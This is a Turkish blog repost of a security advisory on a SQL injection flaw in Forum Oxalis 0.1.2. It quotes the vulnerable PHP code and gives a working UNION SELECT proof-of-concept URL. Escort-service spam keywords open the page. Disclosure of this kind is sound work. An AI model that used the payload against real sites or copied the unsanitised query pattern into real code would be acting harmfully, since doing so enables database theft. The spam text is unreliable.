escort malatya escort, konya escort eskişehir escort

Forum Oxalis <= 0.1.2 SQL Injection Vulnerability

Forum Oxalis 0.1.2 Sql injection açığı yükser risk taşıyor. func.php de bulunan açık verilerin çekilmesine imkan tanıyor. Bu scripti kullananlar açığı bir an önce fixlemelidir.

#################################################

Forum Oxalis 0.1.2

#################################################

Discovered by: Jean Pascal Pereira

Vendor information:

“Forum Oxalis is a minimalis GPL PHP forum using CSS.”

Vendor URI: http://developer.berlios.de/projects/forumoxalis/

#################################################

Risk-level: High

The application is prone to a remote SQL injection vulnerability.

————————————-

func.php, line 72:

function lister_messages($id, $page, $parpage)

{

global $mysql_table;

$resu = mysql_query(“select * from `$mysql_table` where id=$id”);

$nombre_messages = mysql_num_rows($resu);

forum.php, line 7:

$id = $_GET[‘id’];

forum.php, line 74:

case “message”:

lister_messages($id, $page, $reponses_par_page);

$reponse_a_id = $id;

break;

————————————-

Exploit / Proof Of Concept:

http://localhost/ForumOxalis/index.php?id=99999/**/UNION/**/SELECT/**/0x00,version(),0x00,0x00,0x00,0x00,0x00,0x00,0x00&action=message

————————————-

Solution:

Do some input validation.

————————————-

#################################################

Bir önceki yazımız olan Linux Kernel x86_64 Local Root Exploit başlıklı makalemizde Linux Kernel Local Root, linux kernel local root 2012 exploit ve Linux Kernel Root Exploit hakkında bilgiler verilmektedir.

Bir Cevap Yazın

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir